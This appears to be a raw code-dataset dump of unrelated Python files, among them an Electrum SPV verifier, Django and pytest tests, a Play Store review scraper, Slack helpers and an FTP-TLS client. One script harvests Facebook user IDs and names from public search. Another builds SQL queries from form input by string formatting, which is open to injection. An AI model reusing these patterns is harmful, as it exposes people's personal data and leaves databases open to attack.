content
stringlengths
0
894k
type
stringclasses
2 values
class Solution: def mctFromLeafValues(self, arr: List[int]) -> int: """ [6,2,4] l r k [12,24] [24, 8] [36] [32] [6,2,4,1] l r k [12,24, 6] [8] 24 6 8 2 4 1 """ @lru_cache(None) def cost(left, right): if left+1 >= right: return 0 min_cost = float(inf) for k in range(left+1, right): # 1 leaf_costs = max(arr[left:k]) * max(arr[k:right]) # 6, 4 non_leaf_costs = cost(left, k) + cost(k, right) # 0, 1 | 1, 2 min_cost = min(min_cost, leaf_costs + non_leaf_costs) return min_cost return cost(0, len(arr))
python
screen = None window = None class Game(): scene = 'title' state = '' interaction = -1 interaction_level = -1 class Cursor(): menu = 0 class Camera(): position = [-6, -40] class Field(): location = 'home' player_position = [1, 1] player_face = 'D' class Player(): inventory = [] cards = [] deck_1 = [] deck_2 = [] deck_3 = [] life = 20 level = 1 tech = [] class Player_Battle(): deck = [] hand = [] hand_change = [False, False, False] class Battle(): turn = 0 play_mode = 'card' field = [] player_grave = [] enemy_grave = []
python
# Electrum - Lightweight Bitcoin Client # Copyright (c) 2012 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from .util import ThreadJob from .bitcoin import * class SPV(ThreadJob): """ Simple Payment Verification """ def __init__(self, network, wallet): self.wallet = wallet self.network = network self.blockchain = network.blockchain() self.merkle_roots = {} # txid -> merkle root (once it has been verified) self.requested_merkle = set() # txid set of pending requests def run(self): interface = self.network.interface if not interface: return blockchain = interface.blockchain if not blockchain: return lh = self.network.get_local_height() unverified = self.wallet.get_unverified_txs() for tx_hash, tx_height in unverified.items(): # do not request merkle branch before headers are available if (tx_height > 0) and (tx_hash not in self.merkle_roots) and (tx_height <= lh): header = blockchain.read_header(tx_height) if header is None: index = tx_height // 2016 self.network.request_chunk(interface, index) else: if (tx_hash not in self.requested_merkle and tx_hash not in self.merkle_roots): request = ('blockchain.transaction.get_merkle', [tx_hash, tx_height]) self.network.send([request], self.verify_merkle) self.print_error('requested merkle', tx_hash) self.requested_merkle.add(tx_hash) if self.network.blockchain() != self.blockchain: self.blockchain = self.network.blockchain() self.undo_verifications() def verify_merkle(self, r): if r.get('error'): self.print_error('received an error:', r) return params = r['params'] merkle = r['result'] # Verify the hash of the server-provided merkle branch to a # transaction matches the merkle root of its block tx_hash = params[0] tx_height = merkle.get('block_height') pos = merkle.get('pos') merkle_root = self.hash_merkle_root(merkle['merkle'], tx_hash, pos) header = self.network.blockchain().read_header(tx_height) # FIXME: if verification fails below, # we should make a fresh connection to a server to # recover from this, as this TX will now never verify if not header: self.print_error( "merkle verification failed for {} (missing header {})" .format(tx_hash, tx_height)) return if header.get('merkle_root') != merkle_root: self.print_error( "merkle verification failed for {} (merkle root mismatch {} != {})" .format(tx_hash, header.get('merkle_root'), merkle_root)) return # we passed all the tests self.merkle_roots[tx_hash] = merkle_root try: # note: we could pop in the beginning, but then we would request # this proof again in case of verification failure from the same server self.requested_merkle.remove(tx_hash) except KeyError: pass self.print_error("verified %s" % tx_hash) self.wallet.add_verified_tx(tx_hash, (tx_height, header.get('timestamp'), pos)) if self.is_up_to_date() and self.wallet.is_up_to_date(): self.wallet.save_verified_tx(write=True) def hash_merkle_root(self, merkle_s, target_hash, pos): h = hash_decode(target_hash) for i in range(len(merkle_s)): item = merkle_s[i] h = Hash(hash_decode(item) + h) if ((pos >> i) & 1) else Hash(h + hash_decode(item)) return hash_encode(h) def undo_verifications(self): height = self.blockchain.get_checkpoint() tx_hashes = self.wallet.undo_verifications(self.blockchain, height) for tx_hash in tx_hashes: self.print_error("redoing", tx_hash) self.remove_spv_proof_for_tx(tx_hash) def remove_spv_proof_for_tx(self, tx_hash): self.merkle_roots.pop(tx_hash, None) try: self.requested_merkle.remove(tx_hash) except KeyError: pass def is_up_to_date(self): return not self.requested_merkle
python
from datalabframework import params, project import os from textwrap import dedent import pytest from testfixtures import TempDirectory @pytest.fixture() def dir(): with TempDirectory() as dir: original_dir = os.getcwd() os.chdir(dir.path) p = project.Config() p.__class__._instances={}; project.Config(dir.path) yield dir os.chdir(original_dir) class Test_rootpath(object): def test_minimal(self, dir): yml = '''\ --- a: b: 'ohoh' c: 42 s: 1 ''' dir.write('metadata.yml', dedent(yml).encode()) assert(params.metadata()=={'a': {'b': 'ohoh', 'c': 42, 's': 1}, 'resources': {}, 'engines':{}, 'loggers':{}, 'providers': {}, 'run': 'default'}) def test_minimal_with_resources(self, dir): yml = '''\ --- a: b: 'ohoh' c: 42 s: 1 resources: hello: best:resource ''' dir.write('metadata.yml', dedent(yml).encode()) assert(params.metadata()=={'a': {'b': 'ohoh', 'c': 42, 's': 1}, 'resources': { '.hello': 'best:resource'},'engines':{}, 'loggers':{}, 'providers': {}, 'run': 'default'}) def test_minimal_with_rendering(self, dir): yml = '''\ --- a: b: 'ohoh' c: 42 s: ping-{{ default.foo.bar.best }} foo: bar: best: pong ''' dir.write('metadata.yml', dedent(yml).encode()) assert(params.metadata()=={'a': {'b': 'ohoh', 'c': 42, 's': 'ping-pong'}, 'foo': { 'bar': {'best':'pong'}}, 'resources': {}, 'engines':{}, 'loggers':{}, 'providers': {}, 'run': 'default'}) def test_minimal_with_rendering_multiple_docs(self, dir): yml = '''\ --- a: b: 'ohoh' c: 42 s: ping-{{ ping.foo.bar.best }} --- run: ping foo: bar: best: pong ''' dir.write('metadata.yml', dedent(yml).encode()) assert(params.metadata()=={'a': {'b': 'ohoh', 'c': 42, 's': 'ping-pong'}, 'resources': {}, 'engines':{}, 'loggers':{}, 'providers': {}, 'run': 'default'}) def test_multiple_docs(self,dir): yml = '''\ --- a: b: 'ohoh' resources: hello: a:1 --- run: second c: d: 'lalala' resources: world: b: 2 ''' dir.write('metadata.yml', dedent(yml).encode()) assert(params.metadata()=={'a': {'b': 'ohoh'}, 'resources': {'.hello': 'a:1'},'engines':{}, 'loggers':{}, 'providers': {},'run':'default'}) assert(params.metadata(all_runs=True)=={ 'default': {'a': {'b': 'ohoh'}, 'resources': {'.hello': 'a:1'}, 'engines':{}, 'loggers':{}, 'providers': {}, 'run': 'default'}, 'second': {'c': {'d': 'lalala'},'resources': {'.world': {'b': 2}},'engines':{}, 'loggers':{}, 'providers': {},'run': 'second'} }) def test_multiple_files(self,dir): yml_1 = '''\ --- a: b: 'ohoh' --- run: second c: d: 'lalala' ''' yml_2 = '''\ --- resources: hello: a:1 --- run: second resources: world: b: 2 ''' subdir = dir.makedir('abc') dir.write('metadata.yml', dedent(yml_1).encode()) dir.write('abc/metadata.yml', dedent(yml_2).encode()) assert(params.metadata()=={'a': {'b': 'ohoh'}, 'resources': {'.abc.hello': 'a:1'}, 'engines':{}, 'loggers':{}, 'providers': {},'run':'default'}) assert(params.metadata(all_runs=True)=={ 'default': {'a': {'b': 'ohoh'}, 'resources': {'.abc.hello': 'a:1'},'engines':{}, 'loggers':{}, 'providers': {},'run':'default'}, 'second': {'c': {'d': 'lalala'},'resources': {'.abc.world': {'b': 2}},'engines':{}, 'loggers':{}, 'providers': {},'run': 'second'} }) class Test_metadata_info(object): def test_multiple_files(self,dir): yml_1 = '''\ --- a: b: 'ohoh' --- run: second c: d: 'lalala' ''' yml_2 = '''\ --- resources: hello: a:1 --- run: second resources: world: b: 2 ''' subdir = dir.makedir('abc') dir.write('__main__.py', b'') dir.write('metadata.yml', dedent(yml_1).encode()) dir.write('abc/metadata.yml', dedent(yml_2).encode()) res = ['metadata.yml', os.path.join('abc', 'metadata.yml')] assert(params.metadata_files()==res)
python
import os,time,requests,re from time import sleep id=[] def search(url): global id sleep(2) req=requests.get(url).text usr=re.findall(r'<td class="bz ca"><a href="(.*?)"><div class="cb"><div class="cc">(.*?)</div></div>',req) for user in usr: username=user[0].replace("/","") if 'profile' in username: id.append(username.replace("profile.php?id=","")+"|"+user[1]) else: id.append(username+"|"+user[1]) if "Lihat Hasil Selanjutnya" in req: url=re.findall(r'<div class="l m" id="see_more_pager"><a href="(.*?)">',req)[0] search(url) return id if __name__=="__main__": os.system("clear") print("\t\033[1;97mGet Username FB From Public") print("\t\033[96m___________________________\033[00m") nm=input("\t\033[00mQuery Name : \033[96m") print("\n") username=search("https://mbasic.facebook.com/public/"+nm) for user in username: user=user.split("|") print("\033[00m"+user[0]+"\033[96m|\033[00m"+user[1])
python
import logging import json class Logger: def __init__(self): pass @staticmethod def log(info_type, message): try: uid = json.loads(str(message[0]))['result'] if len(uid) == 16: uid_file = open('./chaostoolbox/data/log/uid.log','a') uid_file.write(uid + '\n') uid_file.close() except Exception: pass # 日志格式化输出 LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s" #DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p" logging.basicConfig(level=logging.INFO, format=LOG_FORMAT, filename='./chaostoolbox/data/log/record.log') if info_type == "debug": logging.info(message) elif info_type == 'info': logging.info(message) elif info_type == 'warning': logging.warning(message) else: logging.error(message) @staticmethod def get_uid_list(): with open('./chaostoolbox/data/log/uid.log', 'r') as f: uids = [line.strip('\n') for line in f] uids.reverse() return uids @staticmethod def clear_uid_file(): with open('./chaostoolbox/data/log/uid.log', 'w') as f: f.close()
python
import os import glob import re path = '\Documents\python\C++Examples' gramHash = {} for filename in glob.glob('*.cpp'): outFile = open('KnownCPP.txt', 'a') fileOpen = open(filename, 'r', encoding='utf8', errors='ignore') fileString = "" for line in fileOpen: # Removes non ASCII characters line = re.sub(r'[^\x00-\x7F]+',' ', line) try: fileString += line except: pass fileString = os.linesep.join([s for s in fileString.splitlines() if s]) fileString = re.sub('\\n|\\r|/\s\s+/g}',' ',fileString) fileString = re.sub('\.', ' ', fileString) fileString = re.sub('\\t', '',fileString) fileString = re.sub(re.compile("/\*.*?\*/",re.DOTALL ) ,"" ,fileString) fileString = re.sub(re.compile("//.*?\n" ) ,"" ,fileString) fileString = re.sub( '[^0-9a-zA-Z]+', ' ', fileString ) fileString = re.sub( '\s+', ' ', fileString ).strip() outFile.write(fileString) fileOpen.close()
python
import torch from ncc.modules.decoders.ncc_incremental_decoder import NccIncrementalDecoder class SequenceCompletor(object): def __init__( self, retain_dropout=False, ): """Generates translations of a given source sentence. Args: retain_dropout (bool, optional): use dropout when generating (default: False) """ self.retain_dropout = retain_dropout @torch.no_grad() def complete(self, models, sample, **kwargs): """Generate a batch of translations. Args: models (List[~fairseq.models.NccModel]): ensemble of models sample (dict): batch prefix_tokens (torch.LongTensor, optional): force decoder to begin with these tokens bos_token (int, optional): beginning of sentence token (default: self.eos) """ model = EnsembleModel(models) return self._complete(model, sample, **kwargs) @torch.no_grad() def generate(self, *args, **kwargs): return self.complete(*args, **kwargs) @torch.no_grad() def _complete( self, model, sample, **kwargs ): if not self.retain_dropout: model.eval() net_output = model(**sample['net_input']) return net_output class EnsembleModel(torch.nn.Module): """A wrapper around an ensemble of models.""" def __init__(self, models): super().__init__() self.models = torch.nn.ModuleList(models) self.incremental_states = None if all(hasattr(m, 'decoder') and isinstance(m.decoder, NccIncrementalDecoder) for m in models): self.incremental_states = {m: {} for m in models} @torch.no_grad() def forward(self, src_tokens, **kwargs): """ Run the forward pass for a decoder-only model. Feeds a batch of tokens through the decoder to predict the next tokens. Args: src_tokens (LongTensor): tokens on which to condition the decoder, of shape `(batch, tgt_len)` src_lengths (LongTensor): source sentence lengths of shape `(batch)` Returns: tuple: - the decoder's output of shape `(batch, seq_len, vocab)` - a dictionary with any model-specific outputs """ if len(self.models) == 1: return self.models[0](src_tokens, **kwargs) for model in zip(self.models): pass
python
from django.forms import ModelForm from django.test import TestCase from .models import JSONNotRequiredModel class JSONModelFormTest(TestCase): def setUp(self): class JSONNotRequiredForm(ModelForm): class Meta: model = JSONNotRequiredModel fields = '__all__' self.form_class = JSONNotRequiredForm def test_blank_form(self): form = self.form_class(data={'json': ''}) self.assertFalse(form.has_changed()) def test_form_with_data(self): form = self.form_class(data={'json': '{}'}) self.assertTrue(form.has_changed()) def test_form_save(self): form = self.form_class(data={'json': ''}) form.save() def test_save_values(self): values = [ # (type, form input, db value) ('object', '{"a": "b"}', {'a': 'b'}), ('array', '[1, 2]', [1, 2]), ('string', '"test"', 'test'), ('float', '1.2', 1.2), ('int', '1234', 1234), ('bool', 'true', True), ('null', 'null', None), ] for vtype, form_input, db_value in values: with self.subTest(type=vtype, input=form_input, db=db_value): form = self.form_class(data={'json': form_input}) self.assertTrue(form.is_valid(), msg=form.errors) instance = form.save() self.assertEqual(instance.json, db_value) def test_render_initial_values(self): values = [ # (type, db value, form output) ('object', {'a': 'b'}, '{\n "a": "b"\n}'), ('array', [1, 2], "[\n 1,\n 2\n]"), ('string', 'test', '"test"'), ('float', 1.2, '1.2'), ('int', 1234, '1234'), ('bool', True, 'true'), ('null', None, 'null'), ] for vtype, db_value, form_output in values: with self.subTest(type=vtype, db=db_value, output=form_output): instance = JSONNotRequiredModel.objects.create(json=db_value) form = self.form_class(instance=instance) self.assertEqual(form['json'].value(), form_output) def test_render_bound_values(self): values = [ # (type, db value, form input, form output) ('object', '{"a": "b"}', '{\n "a": "b"\n}'), ('array', '[1, 2]', "[\n 1,\n 2\n]"), ('string', '"test"', '"test"'), ('float', '1.2', '1.2'), ('int', '1234', '1234'), ('bool', 'true', 'true'), ('null', 'null', 'null'), ] for vtype, form_input, form_output in values: with self.subTest(type=vtype, input=form_input, output=form_output): form = self.form_class(data={'json': form_input}) self.assertEqual(form['json'].value(), form_output) def test_invalid_value(self): form = self.form_class(data={'json': 'foo'}) self.assertFalse(form.is_valid()) self.assertEqual(form.errors, { 'json': ['"foo" value must be valid JSON.'], }) self.assertEqual(form['json'].value(), 'foo') def test_disabled_field(self): instance = JSONNotRequiredModel.objects.create(json=100) form = self.form_class(data={'json': '{"foo": "bar"}'}, instance=instance) form.fields['json'].disabled = True self.assertTrue(form.is_valid()) self.assertEqual(form.cleaned_data, {'json': 100}) # rendered value self.assertEqual(form['json'].value(), '100')
python
import collections class Equalizer: def __init__(self, levels: list): _dict = collections.defaultdict(int) _dict.update(levels) _dict = [{"band": i, "gain": _dict[i]} for i in range(15)] self.eq = _dict self.raw = levels @classmethod def build(cls, *, levels: list): return cls(levels) @classmethod def flat(cls): """Flat Equalizer. Resets your EQ to Flat. """ return cls([(0, .0), (1, .0), (2, .0), (3, .0), (4, .0), (5, .0), (6, .0), (7, .0), (8, .0), (9, .0), (10, .0), (11, .0), (12, .0), (13, .0), (14, .0)]) @classmethod def boost(cls): """Boost Equalizer. This equalizer emphasizes Punchy Bass and Crisp Mid-High tones. Not suitable for tracks with Deep/Low Bass. """ return cls([(0, -0.075), (1, .125), (2, .125), (3, .1), (4, .1), (5, .05), (6, 0.075), (7, .0), (8, .0), (9, .0), (10, .0), (11, .0), (12, .125), (13, .15), (14, .05)]) @classmethod def metal(cls): """Experimental Metal/Rock Equalizer. Expect clipping on Bassy songs. """ return cls([(0, .0), (1, .1), (2, .1), (3, .15), (4, .13), (5, .1), (6, .0), (7, .125), (8, .175), (9, .175), (10, .125), (11, .125), (12, .1), (13, .075), (14, .0)]) @classmethod def piano(cls): """Piano Equalizer. Suitable for Piano tracks, or tacks with an emphasis on Female Vocals. Could also be used as a Bass Cutoff. """ return cls([(0, -0.25), (1, -0.25), (2, -0.125), (3, 0.0), (4, 0.25), (5, 0.25), (6, 0.0), (7, -0.25), (8, -0.25), (9, 0.0), (10, 0.0), (11, 0.5), (12, 0.25), (13, -0.025)])
python
# Copyright 2019-2020 SURF. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from datetime import datetime from typing import Dict, List, Optional from uuid import UUID from orchestrator.schemas.base import OrchestratorBaseModel TagConfig = Dict[str, List[Dict[str, bool]]] class FixedInputBaseSchema(OrchestratorBaseModel): fixed_input_id: Optional[UUID] name: str value: str product_id: Optional[UUID] class FixedInputSchema(FixedInputBaseSchema): fixed_input_id: UUID created_at: datetime product_id: UUID class Config: orm_mode = True class FixedInputConfigurationItemSchema(OrchestratorBaseModel): name: str description: str values: List[str] class FixedInputConfigurationSchema(OrchestratorBaseModel): fixed_inputs: List[FixedInputConfigurationItemSchema] by_tag: TagConfig
python
import sys,os import traceback import time import shutil import json import requests from selenium import webdriver from PIL import Image class ScriptError (Exception): pass def iw (webhook:str, message:str): """ post message to slack channel """ data = json.dumps({ 'text' : message }) res = requests.post(webhook, data=data) return res def files_upload (token:str, channel:str, filename:str, comment:str): """ upload file to slack channel """ url = 'https://slack.com/api/files.upload' files = {'file': open(filename, 'rb')} data = { 'token': token, 'channels': channel, 'filename': filename, 'initial_comment': comment, 'filetype': 'jpg', 'file': files } res = requests.post(url, data=data, files=files) return res def dl (url:str) -> str: """ download file from web and save to local """ filename = os.path.basename(url) res = requests.get(url, stream=True) if not res.status_code == 200: time.sleep(60) res = requests.get(url, stream=True) if not res.status_code == 200: return 'Fail' with open(filename, 'wb') as file: res.raw.decode_content = True shutil.copyfileobj(res.raw, file) return filename def concat_h (images:list): """ connect images(list) horizontally """ n = len(images) im0 = Image.open(images[0]) ret = Image.new('RGB',(im0.width*n, im0.height)) for i,img in enumerate(images): im = Image.open(img) ret.paste(im, (im0.width*i, 0)) return ret def concat_v (images:list): """ concat images(list) vertically """ n = len(images) im0 = Image.open(images[0]) ret = Image.new('RGB',(im0.width, im0.height*n)) for i,img in enumerate(images): im = Image.open(img) ret.paste(im, (0, im0.height*i)) return ret def prev_flyer () -> dict: """ get previous flyer info from my WebAPI """ url = 'https://mollinaca.github.io/flyers/latest.json' # url = 'https://mollinaca.github.io/flyers/latest_test.json' res = requests.get(url) if res.status_code == 200: body = res.text else: time.sleep(60) res = requests.get(url) if res.status_code == 200: body = res.text else: raise ScriptError ('Error: get latest.json not 200') ret = json.loads(body) return ret
python
import json from time import sleep try: from typing import Optional, Tuple except ImportError: pass from google_play_scraper import Sort from google_play_scraper.constants.element import ElementSpecs from google_play_scraper.constants.regex import Regex from google_play_scraper.constants.request import Formats from google_play_scraper.utils.request import post LANG_DEFAULT = "en" COUNTRY_DEFAULT = "us" SORT_DEFAULT = Sort.NEWEST COUNT_DEFAULT = 100 class ContinuationToken: __slots__ = "token", "lang", "country", "sort", "count", "filter_score_with" def __init__(self, token, lang, country, sort, count, filter_score_with): self.token = token self.lang = lang self.country = country self.sort = sort self.count = count self.filter_score_with = filter_score_with def unpack(self): return ( self.token, self.lang, self.country, self.sort, self.count, self.filter_score_with, ) async def _fetch_review_items(url, app_id, sort, count, filter_score_with, pagination_token): dom = await post( url, Formats.ReviewsBodyData.build( app_id, sort, count, "null" if filter_score_with is None else filter_score_with, pagination_token, ), {"content-type": "application/x-www-form-urlencoded"}, ) match = json.loads(Regex.REVIEWS.findall(dom)[0]) return json.loads(match[0][2])[0], json.loads(match[0][2])[-1][-1] async def reviews( app_id, lang=None, country=None, sort=None, count=None, filter_score_with=None, continuation_token=None, ): # type: (str, str, str, int, int, Optional[int], Optional[ContinuationToken]) -> Tuple[list, ContinuationToken] if continuation_token is not None: token = continuation_token.token lang = continuation_token.lang if lang is None else lang country = continuation_token.country if country is None else country sort = continuation_token.sort if sort is None else sort count = continuation_token.count if count is None else count filter_score_with = ( continuation_token.filter_score_with if filter_score_with is None else filter_score_with ) else: token = None if lang is None: lang = LANG_DEFAULT if country is None: country = COUNTRY_DEFAULT if sort is None: sort = SORT_DEFAULT if count is None: count = COUNT_DEFAULT if count < 200: _count = count else: _count = 199 url = Formats.Reviews.build(lang=lang, country=country) result = [] while True: try: review_items, token = await _fetch_review_items( url, app_id, sort, _count, filter_score_with, token ) except (TypeError, IndexError): token = None break for review in review_items: review_dict = {} for k, spec in ElementSpecs.Review.items(): review_dict[k] = spec.extract_content(review) result.append(review_dict) remaining_count_of_reviews_to_fetch = count - len(result) if remaining_count_of_reviews_to_fetch == 0: break if isinstance(token, list): token = None break if remaining_count_of_reviews_to_fetch < 200: _count = remaining_count_of_reviews_to_fetch return ( result, ContinuationToken(token, lang, country, sort, count, filter_score_with), ) async def reviews_all(app_id, sleep_milliseconds=0, **kwargs): kwargs.pop("count", None) kwargs.pop("continuation_token", None) _count = 199 _continuation_token = None result = [] while True: result_, _continuation_token = await reviews( app_id, count=_count, continuation_token=_continuation_token, **kwargs ) result += result_ if _continuation_token.token is None: break if sleep_milliseconds: sleep(sleep_milliseconds / 1000) return result
python
from ..sql_helper import SQLHelper from shapely import wkb from shapely.geometry import Polygon from .filtering import filtering_objects def generate_rectangle_information(form): """ Функция для генерации информации по области :param form: форма из POST запроса с координатами области (прямоугольника) и 6 основными фильтрами :return: dict с преобразованной информацией """ sh = SQLHelper() rectangle_coord = form.pop('rectangleCoord') filters = filtering_objects(form) x1 = rectangle_coord[0] y1 = rectangle_coord[1] x2 = rectangle_coord[2] y2 = rectangle_coord[3] sql_text = """ select sum(people) as sum, ST_Area(ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326)), ST_Area(ST_Union(geometry)) as all_area from ( select geometry, people, ST_IsEmpty(ST_Intersection(ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326), geometry)) as flag from "Moscow" m ) as a where flag is False; """.format( x1=x1, y1=y1, x2=x2, y2=y2 ) sql_result = sh.execute(sql_text) people_sum = None st_area = None all_area = None for row in sql_result: people_sum = float(row['sum']) st_area = float(row['st_area']) all_area = float(row['all_area']) people_st_area = people_sum * st_area / all_area sql_text = """ select grouped, count(latitude) as cnt, sum(area) / 1000000 as area_sum, string_agg(distinct zones_type, ', ') as zones_type_agg, string_agg(distinct sport_type, ', ') as sport_type_agg, ST_Union(geometry) as geometry from ( select 'grouped' as grouped, object_id, area, zones_type, sport_type, st_contains(ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326), geometry) as flag, latitude, ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326) as geometry from "Objects" o {filter} ) as t where flag is true group by grouped """.format( x1=x1, y1=y1, x2=x2, y2=y2, filter='' if not filters else 'where {}'.format(filters) ) sql_result = sh.execute(sql_text) cnt = 0 total_area_of_sports_zones = 0 types_of_sports_zones = '' types_of_sports_services = '' geometry = None for row in sql_result: cnt = float(row['cnt']) total_area_of_sports_zones = float(row['area_sum']) types_of_sports_zones = row['zones_type_agg'] types_of_sports_services = row['sport_type_agg'] geometry = row['geometry'] if not geometry: geometry = Polygon() else: geometry = wkb.loads(geometry, hex=True) cnt = round(cnt * 100000 / people_st_area, 2) total_area_of_sports_zones = round(total_area_of_sports_zones * 100000 / people_st_area, 2) result = { 'count': cnt, 'avrgArea': total_area_of_sports_zones, 'typeZones': types_of_sports_zones, 'typeServs': types_of_sports_services, 'geometry': geometry } return result
python
from enum import Enum, unique @unique class MeboCommands(Enum): READERS = "READERS" FACTORY = "FACTORY" BAT = "BAT" WHEEL_LEFT_FORWARD = "WHEEL_LEFT_FORWARD" WHEEL_LEFT_BACKWARD = "WHEEL_LEFT_BACKWARD" WHEEL_RIGHT_FORWARD = "WHEEL_RIGHT_FORWARD" WHEEL_RIGHT_BACKWARD = "WHEEL_RIGHT_BACKWARD" WHEEL_BOTH_STOP = "WHEEL_BOTH_STOP" ARM_UP = "ARM_UP" ARM_DOWN = "ARM_DOWN" ARM_POSITION = "ARM_POSITION" ARM_STOP = "ARM_STOP" ARM_QUERY = "ARM_QUERY" WRIST_UD_UP = "WRIST_UD_UP" WRIST_UD_DOWN = "WRIST_UD_DOWN" WRIST_UD_POSITION = "WRIST_UD_POSITION" WRIST_UD_STOP = "WRIST_UD_STOP" WRIST_UD_QUERY = "WRIST_UD_QUERY" WRIST_ROTATE_LEFT = "WRIST_ROTATE_LEFT" WRIST_ROTATE_RIGHT = "WRIST_ROTATE_RIGHT" WRIST_ROTATE_POSITION = "WRIST_ROTATE_POSITION" WRIST_ROTATE_STOP = "WRIST_ROTATE_STOP" WRIST_ROTATE_QUERY = "WRIST_ROTATE_QUERY" CLAW_POSITION = "CLAW_POSITION" CLAW_STOP = "CLAW_STOP" CLAW_QUERY = "CLAW_QUERY" SET_TURNING_SPEED_1 = "SET_TURNING_SPEED_1" SET_TURNING_SPEED_2 = "SET_TURNING_SPEED_2" SET_TURNING_SPEED_3 = "SET_TURNING_SPEED_3" CAL_ARM = "CAL_ARM" CAL_WRIST_UD = "CAL_WRIST_UD" CAL_WRIST_ROTATE = "CAL_WRIST_ROTATE" CAL_CLAW = "CAL_CLAW" CAL_ALL = "CAL_ALL" VERSION_QUERY = "VERSION_QUERY" REBOOT_CMD = "REBOOT_CMD" JOINT_SPEED = "JOINT_SPEED" SET_REG = "SET_REG" QUERY_REG = "QUERY_REG" SAVE_REG = "SAVE_REG" WHEEL_LEFT_SPEED = "WHEEL_LEFT_SPEED" WHEEL_RIGHT_SPEED = "WHEEL_RIGHT_SPEED" QUERY_EVENT = "QUERY_EVENT" NONE = "NONE"
python
from __future__ import annotations from abc import ABC, abstractmethod from typing import Final, Dict, Optional, final, List, Any from ftplib import FTP_TLS from functools import cached_property import ssl import os class FTPClient(ABC): HOSTS: Final[Dict[str, Optional[str]]] = { 'main': 'reefledge-ftp-server-main.com', 'backup': 'reefledge-ftp-server-backup.com', } SERVER_PORT: Final[int] = 21 ftp_tls: FTP_TLS def __enter__(self) -> FTPClient: self.connect() self.login() return self @final def connect(self) -> None: self._connect() self._enforce_tight_security() @abstractmethod def _connect(self) -> None: pass def _enforce_tight_security(self) -> None: self.ftp_tls.auth() self.ftp_tls.prot_p() def _connect_to_main_server(self) -> None: self.__connect(host_address=self.HOSTS['main']) def _connect_to_backup_server(self) -> None: self.__connect(host_address=self.HOSTS['backup']) def __connect(self, *, host_address: str) -> None: self.ftp_tls = FTP_TLS(context=self.ssl_context) self.ftp_tls.connect(host=host_address, port=self.SERVER_PORT) @cached_property def ssl_context(self) -> ssl.SSLContext: try: _ssl_context = ssl.create_default_context(cafile=self.ca_file_path) except Exception as exception: error_message: str = f'Invalid `cafile`: "{self.ca_file_path}"' raise exception.__class__(error_message) else: return _ssl_context @cached_property def ca_file_path(self) -> str: this_directory_name: str = os.path.abspath(os.path.dirname(__file__)) _ca_file_path = os.path.join(this_directory_name, 'isrgrootx1.pem') return _ca_file_path @abstractmethod def login(self) -> None: pass def _login(self, *, user_name: str, password: str) -> None: self.ftp_tls.login(user=user_name, passwd=password) def cwd(self, remote_directory_name: str) -> None: self.ftp_tls.cwd(remote_directory_name) def list_directory(self, remote_directory_name: str) -> List[str]: return self.ftp_tls.nlst(remote_directory_name) def __exit__(self, *args: Any) -> None: try: self.ftp_tls.quit() except: self.ftp_tls.close() # Close unilaterally.
python
import os dir_path = os.path.dirname(os.path.realpath(__file__)) name = 'toyui' namespace = 'toy' export = 'TOY_UI_EXPORT' subdir = 'toyui' dependencies = ['toyobj'] rootdir = dir_path basetypes = []
python
# This is a script that calculates WER of different decades in vks_kotus_sample.json. # There are currently some decades not analysed, as we got sufficient picture when # we just ensured that there are no excessive gaps of several decades. # Also the current corpus is temporally relatively limited, so this is a minor issue. # In the further work more data from all decades should be included. # Currently missing decades are 1690, 1720, 1740 and 1770. from mikatools import * from collections import Counter from random import sample, random from jiwer import wer import matplotlib.pyplot as plt test = json_load("old_literary_finnish.json") x = [] y = [] for year in test: ground_truth = [] hypothesis = [] for s in year: if 'language' not in s: ground_truth.append(s['sentence_gt']) hypothesis.append(s['sentence_n']) error = wer(ground_truth, hypothesis) print(year[0]['decade'], error) if error > 0.0: x.append(year[0]['decade']) y.append(error) plt.plot(x, y)
python
# --------------------------------------------------------------------- # Vendor: Zyxel # OS: ZyNOS_EE # --------------------------------------------------------------------- # Copyright (C) 2007-2011 The NOC Project # See LICENSE for details # --------------------------------------------------------------------- # NOC Modules from noc.core.profile.base import BaseProfile class Profile(BaseProfile): name = "Zyxel.ZyNOS_EE" pattern_password = "Password: " pattern_prompt = r"^\S+?> " pattern_more = r"^-- more --.*?$" command_more = " " command_exit = "exit" enable_cli_session = False command_save_config = "config save" pattern_syntax_error = r"^Valid commands are:"
python
